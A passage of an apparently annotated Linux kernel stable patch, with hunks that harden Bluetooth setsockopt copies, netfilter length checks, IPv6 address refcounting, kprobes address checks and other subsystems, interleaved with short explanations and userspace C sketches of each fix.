+ # define lockdep_hrtimer_enter(__hrtimer)	false
+-# define lockdep_hrtimer_exit(__context)	do { } while (0)
++# define lockdep_hrtimer_exit(__context)	do { (void)(__context); } while (0)
+ # define lockdep_posixtimer_enter()		do { } while (0)
+ # define lockdep_posixtimer_exit()		do { } while (0)
+ # define lockdep_irq_work_enter(__work)		do { } while (0)
+diff --git a/include/linux/u64_stats_sync.h b/include/linux/u64_stats_sync.h
+index 46040d66334a8..79c3bbaa7e13e 100644
+--- a/include/linux/u64_stats_sync.h
++++ b/include/linux/u64_stats_sync.h
+@@ -135,10 +135,11 @@ static inline void u64_stats_inc(u64_stats_t *p)
+ 	p->v++;
+ }
+ 
+-static inline void u64_stats_init(struct u64_stats_sync *syncp)
+-{
+-	seqcount_init(&syncp->seq);
+-}
++#define u64_stats_init(syncp)				\
++	do {						\
++		struct u64_stats_sync *__s = (syncp);	\
++		seqcount_init(&__s->seq);		\
++	} while (0)
+ 
+ static inline void __u64_stats_update_begin(struct u64_stats_sync *syncp)
+ {
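The u64_stats_init() change above converts an inline function into a macro. The likely motivation (our reading, not stated in the hunk) is lockdep: seqcount_init() defines a static lock class key at its call site, so as a macro each u64_stats_init() caller gets a distinct key, instead of every sync object sharing the single key inside the old inline function. An illustration with hypothetical names:

struct foo_stats {
	struct u64_stats_sync syncp;
	u64_stats_t packets;
};

static struct foo_stats rx_stats, tx_stats;

static void foo_stats_setup(void)
{
	u64_stats_init(&rx_stats.syncp);	/* lockdep key for this call site */
	u64_stats_init(&tx_stats.syncp);	/* a distinct key for this one */
}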
+diff --git a/include/net/addrconf.h b/include/net/addrconf.h
+index 86eb2aba1479c..5bcc63eade035 100644
+--- a/include/net/addrconf.h
++++ b/include/net/addrconf.h
+@@ -437,6 +437,10 @@ static inline void in6_ifa_hold(struct inet6_ifaddr *ifp)
+ 	refcount_inc(&ifp->refcnt);
+ }
+ 
++static inline bool in6_ifa_hold_safe(struct inet6_ifaddr *ifp)
++{
++	return refcount_inc_not_zero(&ifp->refcnt);
++}
+ 
+ /*
+  *	compute link-local solicited-node multicast address
+diff --git a/include/net/af_unix.h b/include/net/af_unix.h
+index 0920b669b9b31..16d6936baa2fb 100644
+--- a/include/net/af_unix.h
++++ b/include/net/af_unix.h
+@@ -54,7 +54,7 @@ struct unix_sock {
+ 	struct mutex		iolock, bindlock;
+ 	struct sock		*peer;
+ 	struct list_head	link;
+-	atomic_long_t		inflight;
++	unsigned long		inflight;
+ 	spinlock_t		lock;
+ 	unsigned long		gc_flags;
+ #define UNIX_GC_CANDIDATE	0
+diff --git a/include/net/bluetooth/bluetooth.h b/include/net/bluetooth/bluetooth.h
+index bcc5a4cd2c17b..5aaf7d7f3c6fa 100644
+--- a/include/net/bluetooth/bluetooth.h
++++ b/include/net/bluetooth/bluetooth.h
+@@ -565,6 +565,15 @@ static inline struct sk_buff *bt_skb_sendmmsg(struct sock *sk,
+ 	return skb;
+ }
+ 
++static inline int bt_copy_from_sockptr(void *dst, size_t dst_size,
++				       sockptr_t src, size_t src_size)
++{
++	if (dst_size > src_size)
++		return -EINVAL;
++
++	return copy_from_sockptr(dst, src, dst_size);
++}
++
+ int bt_to_errno(u16 code);
+ __u8 bt_status(int err);
+ 
+diff --git a/include/net/ip_tunnels.h b/include/net/ip_tunnels.h
+index bca80522f95c8..f9906b73e7ff4 100644
+--- a/include/net/ip_tunnels.h
++++ b/include/net/ip_tunnels.h
+@@ -351,6 +351,39 @@ static inline bool pskb_inet_may_pull(struct sk_buff *skb)
+ 	return pskb_network_may_pull(skb, nhlen);
+ }
+ 
++/* Variant of pskb_inet_may_pull() that also handles VLAN-tagged frames.
++ */
++static inline bool skb_vlan_inet_prepare(struct sk_buff *skb)
++{
++	int nhlen = 0, maclen = ETH_HLEN;
++	__be16 type = skb->protocol;
++
++	/* Essentially this is skb_protocol(skb, true); as a side effect,
++	 * we also get the MAC header length.
++	 */
++	if (eth_type_vlan(type))
++		type = __vlan_get_protocol(skb, type, &maclen);
++
++	switch (type) {
++#if IS_ENABLED(CONFIG_IPV6)
++	case htons(ETH_P_IPV6):
++		nhlen = sizeof(struct ipv6hdr);
++		break;
++#endif
++	case htons(ETH_P_IP):
++		nhlen = sizeof(struct iphdr);
++		break;
++	}
++	/* For ETH_P_IPV6/ETH_P_IP we make sure to pull
++	 * a base network header into skb->head.
++	 */
++	if (!pskb_may_pull(skb, maclen + nhlen))
++		return false;
++
++	skb_set_network_header(skb, maclen);
++	return true;
++}
++
+ static inline int ip_encap_hlen(struct ip_tunnel_encap *e)
+ {
+ 	const struct ip_tunnel_encap_ops *ops;
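The geneve hunks earlier in this patch switch from pskb_inet_may_pull() to this new helper so that VLAN-tagged frames are handled too. A hedged sketch of how a tunnel transmit path would use it (tunnel_xmit_prepare() is a hypothetical caller, not geneve's code):

static int tunnel_xmit_prepare(struct sk_buff *skb)
{
	/* Pull the (possibly VLAN-encapsulated) base network header into
	 * skb->head and set skb's network header offset past the MAC and
	 * VLAN headers before dereferencing it.
	 */
	if (!skb_vlan_inet_prepare(skb))
		return -EINVAL;

	/* ip_hdr(skb) / ipv6_hdr(skb) are now safe to read. */
	return 0;
}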
+diff --git a/io_uring/net.c b/io_uring/net.c
+index b1b564c04d1e7..48404bd330017 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -1229,6 +1229,7 @@ int io_sendmsg_zc(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	if (req_has_async_data(req)) {
+ 		kmsg = req->async_data;
++		kmsg->msg.msg_control_user = sr->msg_control;
+ 	} else {
+ 		ret = io_sendmsg_copy_hdr(req, &iomsg);
+ 		if (ret)
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index e6f0101941ed8..2c44dd12a158c 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -2788,7 +2788,8 @@ enum cpu_mitigations {
+ };
+ 
+ static enum cpu_mitigations cpu_mitigations __ro_after_init =
+-	CPU_MITIGATIONS_AUTO;
++	IS_ENABLED(CONFIG_SPECULATION_MITIGATIONS) ? CPU_MITIGATIONS_AUTO :
++						     CPU_MITIGATIONS_OFF;
+ 
+ static int __init mitigations_parse_cmdline(char *arg)
+ {
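The mitigations default above is now computed at build time from Kconfig: IS_ENABLED(CONFIG_SPECULATION_MITIGATIONS) evaluates to a constant 1 or 0, so it is legal in a static initializer. The same pattern, reduced to a hypothetical option:

/* CONFIG_MY_FEATURE_DEFAULT_ON is a made-up Kconfig symbol; IS_ENABLED()
 * is 1 when the option is y or m, 0 otherwise, and folds at compile time.
 */
static bool my_feature_enabled __ro_after_init =
	IS_ENABLED(CONFIG_MY_FEATURE_DEFAULT_ON);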
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index dbfddfa86c14e..5b5ee060a2db5 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -1567,10 +1567,17 @@ static int check_kprobe_address_safe(struct kprobe *p,
+ 	jump_label_lock();
+ 	preempt_disable();
+ 
+-	/* Ensure it is not in reserved area nor out of text */
+-	if (!(core_kernel_text((unsigned long) p->addr) ||
+-	    is_module_text_address((unsigned long) p->addr)) ||
+-	    in_gate_area_no_mm((unsigned long) p->addr) ||
++	/* Ensure the address is in a text area, and find a module if exists. */
++	*probed_mod = NULL;
++	if (!core_kernel_text((unsigned long) p->addr)) {
++		*probed_mod = __module_text_address((unsigned long) p->addr);
++		if (!(*probed_mod)) {
++			ret = -EINVAL;
++			goto out;
++		}
++	}
++	/* Ensure it is not in reserved area. */
++	if (in_gate_area_no_mm((unsigned long) p->addr) ||
+ 	    within_kprobe_blacklist((unsigned long) p->addr) ||
+ 	    jump_label_text_reserved(p->addr, p->addr) ||
+ 	    static_call_text_reserved(p->addr, p->addr) ||
+@@ -1580,8 +1587,7 @@ static int check_kprobe_address_safe(struct kprobe *p,
+ 		goto out;
+ 	}
+ 
+-	/* Check if 'p' is probing a module. */
+-	*probed_mod = __module_text_address((unsigned long) p->addr);
++	/* Get module refcount and reject __init functions for loaded modules. */
+ 	if (*probed_mod) {
+ 		/*
+ 		 * We must hold a refcount of the probed module while updating
+diff --git a/kernel/power/suspend.c b/kernel/power/suspend.c
+index a718067deecee..3aae526cc4aac 100644
+--- a/kernel/power/suspend.c
++++ b/kernel/power/suspend.c
+@@ -106,6 +106,12 @@ static void s2idle_enter(void)
+ 	swait_event_exclusive(s2idle_wait_head,
+ 		    s2idle_state == S2IDLE_STATE_WAKE);
+ 
++	/*
++	 * Kick all CPUs to ensure that they resume their timers and restore
++	 * consistent system state.
++	 */
++	wake_up_all_idle_cpus();
++
+ 	cpus_read_unlock();
+ 
+ 	raw_spin_lock_irq(&s2idle_lock);
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index d2947de3021a9..337162e0c3d53 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1543,7 +1543,6 @@ static void rb_tail_page_update(struct ring_buffer_per_cpu *cpu_buffer,
+ 	old_write = local_add_return(RB_WRITE_INTCNT, &next_page->write);
+ 	old_entries = local_add_return(RB_WRITE_INTCNT, &next_page->entries);
+ 
+-	local_inc(&cpu_buffer->pages_touched);
+ 	/*
+ 	 * Just make sure we have seen our old_write and synchronize
+ 	 * with any interrupts that come in.
+@@ -1580,8 +1579,9 @@ static void rb_tail_page_update(struct ring_buffer_per_cpu *cpu_buffer,
+ 		 */
+ 		local_set(&next_page->page->commit, 0);
+ 
+-		/* Again, either we update tail_page or an interrupt does */
+-		(void)cmpxchg(&cpu_buffer->tail_page, tail_page, next_page);
++		/* Either we update tail_page or an interrupt does */
++		if (try_cmpxchg(&cpu_buffer->tail_page, &tail_page, next_page))
++			local_inc(&cpu_buffer->pages_touched);
+ 	}
+ }
+ 
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index a6d2f99f847d3..24859d9645050 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -1669,6 +1669,7 @@ static int trace_format_open(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
++#ifdef CONFIG_PERF_EVENTS
+ static ssize_t
+ event_id_read(struct file *filp, char __user *ubuf, size_t cnt, loff_t *ppos)
+ {
+@@ -1683,6 +1684,7 @@ event_id_read(struct file *filp, char __user *ubuf, size_t cnt, loff_t *ppos)
+ 
+ 	return simple_read_from_buffer(ubuf, cnt, ppos, buf, len);
+ }
++#endif
+ 
+ static ssize_t
+ event_filter_read(struct file *filp, char __user *ubuf, size_t cnt,
+@@ -2127,10 +2129,12 @@ static const struct file_operations ftrace_event_format_fops = {
+ 	.release = seq_release,
+ };
+ 
++#ifdef CONFIG_PERF_EVENTS
+ static const struct file_operations ftrace_event_id_fops = {
+ 	.read = event_id_read,
+ 	.llseek = default_llseek,
+ };
++#endif
+ 
+ static const struct file_operations ftrace_event_filter_fops = {
+ 	.open = tracing_open_file_tr,
+diff --git a/net/batman-adv/translation-table.c b/net/batman-adv/translation-table.c
+index 5d8cee74772fe..4fc66cd95dc47 100644
+--- a/net/batman-adv/translation-table.c
++++ b/net/batman-adv/translation-table.c
+@@ -3948,7 +3948,7 @@ void batadv_tt_local_resize_to_mtu(struct net_device *soft_iface)
+ 
+ 	spin_lock_bh(&bat_priv->tt.commit_lock);
+ 
+-	while (true) {
++	while (timeout) {
+ 		table_size = batadv_tt_local_table_transmit_size(bat_priv);
+ 		if (packet_size_max >= table_size)
+ 			break;
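Changing while (true) to while (timeout) turns an unbounded shrink loop into one with a retry budget. A hedged sketch of that bounded-retry shape; the budget is decremented inside the loop, as the full upstream change does with its timeout counter:

#include <stdbool.h>
#include <stdio.h>

/* Shrink *size toward limit, but give up after budget rounds instead
 * of spinning forever when progress stalls. */
static bool shrink_to_limit(unsigned int *size, unsigned int limit,
			    unsigned int budget)
{
	while (budget) {
		if (*size <= limit)
			return true;	/* fits now */
		*size -= *size / 4;	/* make some progress */
		budget--;
	}
	return false;			/* budget exhausted */
}

int main(void)
{
	unsigned int size = 4096;

	printf("fit: %d, size now %u\n",
	       shrink_to_limit(&size, 1000, 10), size);
	return 0;
}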
+diff --git a/net/bluetooth/hci_request.c b/net/bluetooth/hci_request.c
+index 4468647df6722..cf69e973b724f 100644
+--- a/net/bluetooth/hci_request.c
++++ b/net/bluetooth/hci_request.c
+@@ -105,8 +105,10 @@ void hci_req_sync_complete(struct hci_dev *hdev, u8 result, u16 opcode,
+ 	if (hdev->req_status == HCI_REQ_PEND) {
+ 		hdev->req_result = result;
+ 		hdev->req_status = HCI_REQ_DONE;
+-		if (skb)
++		if (skb) {
++			kfree_skb(hdev->req_skb);
+ 			hdev->req_skb = skb_get(skb);
++		}
+ 		wake_up_interruptible(&hdev->req_wait_q);
+ 	}
+ }
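The hci_request hunk frees any previously stashed req_skb before storing the new reference, closing a leak when the completion fires more than once. The free-before-replace idiom, as a hedged userspace sketch with malloc/free standing in for skb refcounting:

#include <stdlib.h>
#include <string.h>

struct dev {
	char *saved;	/* stand-in for hdev->req_skb */
};

/* Replace the saved buffer, releasing whatever was there before so a
 * second completion cannot leak the first buffer. */
static void save_reply(struct dev *d, const char *data)
{
	if (data) {
		free(d->saved);		/* free(NULL) is a no-op */
		d->saved = strdup(data);
	}
}

int main(void)
{
	struct dev d = { 0 };

	save_reply(&d, "first");
	save_reply(&d, "second");	/* "first" is freed, not leaked */
	free(d.saved);
	return 0;
}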
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index 947ca580bb9a2..4198ca66fbe10 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -745,7 +745,7 @@ static int l2cap_sock_setsockopt_old(struct socket *sock, int optname,
+ 	struct sock *sk = sock->sk;
+ 	struct l2cap_chan *chan = l2cap_pi(sk)->chan;
+ 	struct l2cap_options opts;
+-	int len, err = 0;
++	int err = 0;
+ 	u32 opt;
+ 
+ 	BT_DBG("sk %p", sk);
+@@ -772,11 +772,9 @@ static int l2cap_sock_setsockopt_old(struct socket *sock, int optname,
+ 		opts.max_tx   = chan->max_tx;
+ 		opts.txwin_size = chan->tx_win;
+ 
+-		len = min_t(unsigned int, sizeof(opts), optlen);
+-		if (copy_from_sockptr(&opts, optval, len)) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opts, sizeof(opts), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opts.txwin_size > L2CAP_DEFAULT_EXT_WINDOW) {
+ 			err = -EINVAL;
+@@ -819,10 +817,9 @@ static int l2cap_sock_setsockopt_old(struct socket *sock, int optname,
+ 		break;
+ 
+ 	case L2CAP_LM:
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt & L2CAP_LM_FIPS) {
+ 			err = -EINVAL;
+@@ -903,7 +900,7 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 	struct bt_security sec;
+ 	struct bt_power pwr;
+ 	struct l2cap_conn *conn;
+-	int len, err = 0;
++	int err = 0;
+ 	u32 opt;
+ 	u16 mtu;
+ 	u8 mode;
+@@ -929,11 +926,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 
+ 		sec.level = BT_SECURITY_LOW;
+ 
+-		len = min_t(unsigned int, sizeof(sec), optlen);
+-		if (copy_from_sockptr(&sec, optval, len)) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&sec, sizeof(sec), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (sec.level < BT_SECURITY_LOW ||
+ 		    sec.level > BT_SECURITY_FIPS) {
+@@ -978,10 +973,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt) {
+ 			set_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags);
+@@ -993,10 +987,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 		break;
+ 
+ 	case BT_FLUSHABLE:
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt > BT_FLUSHABLE_ON) {
+ 			err = -EINVAL;
+@@ -1028,11 +1021,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 
+ 		pwr.force_active = BT_POWER_FORCE_ACTIVE_ON;
+ 
+-		len = min_t(unsigned int, sizeof(pwr), optlen);
+-		if (copy_from_sockptr(&pwr, optval, len)) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&pwr, sizeof(pwr), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (pwr.force_active)
+ 			set_bit(FLAG_FORCE_ACTIVE, &chan->flags);
+@@ -1041,10 +1032,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 		break;
+ 
+ 	case BT_CHANNEL_POLICY:
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt > BT_CHANNEL_POLICY_AMP_PREFERRED) {
+ 			err = -EINVAL;
+@@ -1089,10 +1079,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(&mtu, optval, sizeof(u16))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&mtu, sizeof(mtu), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (chan->mode == L2CAP_MODE_EXT_FLOWCTL &&
+ 		    sk->sk_state == BT_CONNECTED)
+@@ -1120,10 +1109,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(&mode, optval, sizeof(u8))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&mode, sizeof(mode), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		BT_DBG("mode %u", mode);
+ 
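These l2cap hunks (and the sco_sock ones that follow) funnel every setsockopt copy through one bt_copy_from_sockptr() helper so a too-short optlen is rejected with -EINVAL instead of silently filling only part of the destination, as the old min_t()+copy_from_sockptr() pattern did. A plausible shape for such a helper (a hedged sketch, not the kernel's actual definition), with plain memcpy standing in for copy_from_sockptr():

#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Copy exactly dst_size bytes of option data, refusing short input
 * instead of partially initializing dst. */
static int copy_optval(void *dst, size_t dst_size,
		       const void *src, size_t src_size)
{
	if (src_size < dst_size)
		return -EINVAL;
	memcpy(dst, src, dst_size);
	return 0;
}

int main(void)
{
	unsigned int opt = 0;
	unsigned char short_buf[2] = { 1, 2 };
	unsigned int full = 7;

	printf("short: %d\n", copy_optval(&opt, sizeof(opt),
					  short_buf, sizeof(short_buf)));
	printf("full:  %d (opt=%u)\n",
	       copy_optval(&opt, sizeof(opt), &full, sizeof(full)), opt);
	return 0;
}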
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 6d4168cfeb563..2e9137c539a49 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -831,7 +831,7 @@ static int sco_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			       sockptr_t optval, unsigned int optlen)
+ {
+ 	struct sock *sk = sock->sk;
+-	int len, err = 0;
++	int err = 0;
+ 	struct bt_voice voice;
+ 	u32 opt;
+ 	struct bt_codecs *codecs;
+@@ -850,10 +850,9 @@ static int sco_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt)
+ 			set_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags);
+@@ -870,11 +869,10 @@ static int sco_sock_setsockopt(struct socket *sock, int level, int optname,
+ 
+ 		voice.setting = sco_pi(sk)->setting;
+ 
+-		len = min_t(unsigned int, sizeof(voice), optlen);
+-		if (copy_from_sockptr(&voice, optval, len)) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&voice, sizeof(voice), optval,
++					   optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		/* Explicitly check for these values */
+ 		if (voice.setting != BT_VOICE_TRANSPARENT &&
+@@ -897,10 +895,9 @@ static int sco_sock_setsockopt(struct socket *sock, int level, int optname,
+ 		break;
+ 
+ 	case BT_PKT_STATUS:
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt)
+ 			sco_pi(sk)->cmsg_mask |= SCO_CMSG_PKT_STATUS;
+@@ -941,9 +938,9 @@ static int sco_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(buffer, optval, optlen)) {
++		err = bt_copy_from_sockptr(buffer, optlen, optval, optlen);
++		if (err) {
+ 			hci_dev_put(hdev);
+-			err = -EFAULT;
+ 			break;
+ 		}
+ 
+diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
+index b150c9929b12e..14365b20f1c5c 100644
+--- a/net/ipv4/netfilter/arp_tables.c
++++ b/net/ipv4/netfilter/arp_tables.c
+@@ -966,6 +966,8 @@ static int do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
+@@ -1266,6 +1268,8 @@ static int compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
+diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
+index 1f365e28e316c..a6208efcfccfc 100644
+--- a/net/ipv4/netfilter/ip_tables.c
++++ b/net/ipv4/netfilter/ip_tables.c
+@@ -1120,6 +1120,8 @@ do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
+@@ -1506,6 +1508,8 @@ compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
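The `(u64)len < (u64)tmp.size + sizeof(tmp)` guard, repeated across the arp_tables/ip_tables hunks here and the ip6_tables ones further down, validates in 64-bit arithmetic that the user-supplied blob is at least header plus declared payload, so a huge tmp.size cannot wrap a 32-bit sum. A hedged standalone illustration:

#include <stdint.h>
#include <stdio.h>

struct replace_hdr {
	uint32_t size;	/* declared payload size, attacker-controlled */
};

/* Validate in u64 so size + sizeof(hdr) cannot wrap around. */
static int validate_len(uint32_t len, const struct replace_hdr *hdr)
{
	if ((uint64_t)len < (uint64_t)hdr->size + sizeof(*hdr))
		return -1;
	return 0;
}

int main(void)
{
	struct replace_hdr evil = { .size = UINT32_MAX - 2 };

	/* In 32-bit math, size + sizeof(hdr) would wrap to a tiny value
	 * and the check would wrongly pass. */
	printf("evil accepted: %s\n",
	       validate_len(100, &evil) == 0 ? "yes" : "no");
	return 0;
}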
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index 474f391fab35d..a0c687ff25987 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -926,13 +926,11 @@ void ip_rt_send_redirect(struct sk_buff *skb)
+ 		icmp_send(skb, ICMP_REDIRECT, ICMP_REDIR_HOST, gw);
+ 		peer->rate_last = jiffies;
+ 		++peer->n_redirects;
+-#ifdef CONFIG_IP_ROUTE_VERBOSE
+-		if (log_martians &&
++		if (IS_ENABLED(CONFIG_IP_ROUTE_VERBOSE) && log_martians &&
+ 		    peer->n_redirects == ip_rt_redirect_number)
+ 			net_warn_ratelimited("host %pI4/if%d ignores redirects for %pI4 to %pI4\n",
+ 					     &ip_hdr(skb)->saddr, inet_iif(skb),
+ 					     &ip_hdr(skb)->daddr, &gw);
+-#endif
+ 	}
+ out_put_peer:
+ 	inet_putpeer(peer);
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 1648373692a99..3866deaadbb66 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -2050,9 +2050,10 @@ struct inet6_ifaddr *ipv6_get_ifaddr(struct net *net, const struct in6_addr *add
+ 		if (ipv6_addr_equal(&ifp->addr, addr)) {
+ 			if (!dev || ifp->idev->dev == dev ||
+ 			    !(ifp->scope&(IFA_LINK|IFA_HOST) || strict)) {
+-				result = ifp;
+-				in6_ifa_hold(ifp);
+-				break;
++				if (in6_ifa_hold_safe(ifp)) {
++					result = ifp;
++					break;
++				}
+ 			}
+ 		}
+ 	}
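in6_ifa_hold_safe() takes the reference only while the count is still non-zero, so a lookup racing with the final put cannot resurrect a dying address. The refcount_inc_not_zero() idiom it builds on, as a hedged C11 sketch:

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

struct obj {
	atomic_int refcount;
};

/* Take a reference only if the object is still live (count > 0);
 * mirrors the kernel's refcount_inc_not_zero(). */
static bool get_ref_safe(struct obj *o)
{
	int c = atomic_load(&o->refcount);

	while (c != 0) {
		if (atomic_compare_exchange_weak(&o->refcount, &c, c + 1))
			return true;	/* got a reference */
	}
	return false;			/* object already dying */
}

int main(void)
{
	struct obj live = { .refcount = 1 }, dead = { .refcount = 0 };

	printf("live: %d, dead: %d\n",
	       get_ref_safe(&live), get_ref_safe(&dead));
	return 0;
}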
+diff --git a/net/ipv6/ip6_fib.c b/net/ipv6/ip6_fib.c
+index e606374854ce5..8213626434b91 100644
+--- a/net/ipv6/ip6_fib.c
++++ b/net/ipv6/ip6_fib.c
+@@ -1376,7 +1376,10 @@ int fib6_add(struct fib6_node *root, struct fib6_info *rt,
+ 	     struct nl_info *info, struct netlink_ext_ack *extack)
+ {
+ 	struct fib6_table *table = rt->fib6_table;
+-	struct fib6_node *fn, *pn = NULL;
++	struct fib6_node *fn;
++#ifdef CONFIG_IPV6_SUBTREES
++	struct fib6_node *pn = NULL;
++#endif
+ 	int err = -ENOMEM;
+ 	int allow_create = 1;
+ 	int replace_required = 0;
+@@ -1400,9 +1403,9 @@ int fib6_add(struct fib6_node *root, struct fib6_info *rt,
+ 		goto out;
+ 	}
+ 
++#ifdef CONFIG_IPV6_SUBTREES
+ 	pn = fn;
+ 
+-#ifdef CONFIG_IPV6_SUBTREES
+ 	if (rt->fib6_src.plen) {
+ 		struct fib6_node *sn;
+ 
+diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
+index 37a2b3301e423..b844e519da1b4 100644
+--- a/net/ipv6/netfilter/ip6_tables.c
++++ b/net/ipv6/netfilter/ip6_tables.c
+@@ -1137,6 +1137,8 @@ do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
+@@ -1515,6 +1517,8 @@ compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
+diff --git a/net/openvswitch/conntrack.c b/net/openvswitch/conntrack.c
+index 0591cfb289d50..e4ba86b84b9b1 100644
+--- a/net/openvswitch/conntrack.c
++++ b/net/openvswitch/conntrack.c
+@@ -1711,8 +1711,9 @@ int ovs_ct_copy_action(struct net *net, const struct nlattr *attr,
+ 	if (ct_info.timeout[0]) {
+ 		if (nf_ct_set_timeout(net, ct_info.ct, family, key->ip.proto,
+ 				      ct_info.timeout))
+-			pr_info_ratelimited("Failed to associated timeout "
+-					    "policy `%s'\n", ct_info.timeout);
++			OVS_NLERR(log,
++				  "Failed to associate timeout policy '%s'",
++				  ct_info.timeout);
+ 		else
+ 			ct_info.nf_ct_timeout = rcu_dereference(
+ 				nf_ct_timeout_find(ct_info.ct)->timeout);
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index e1af94393789f..0a75d76535f75 100644
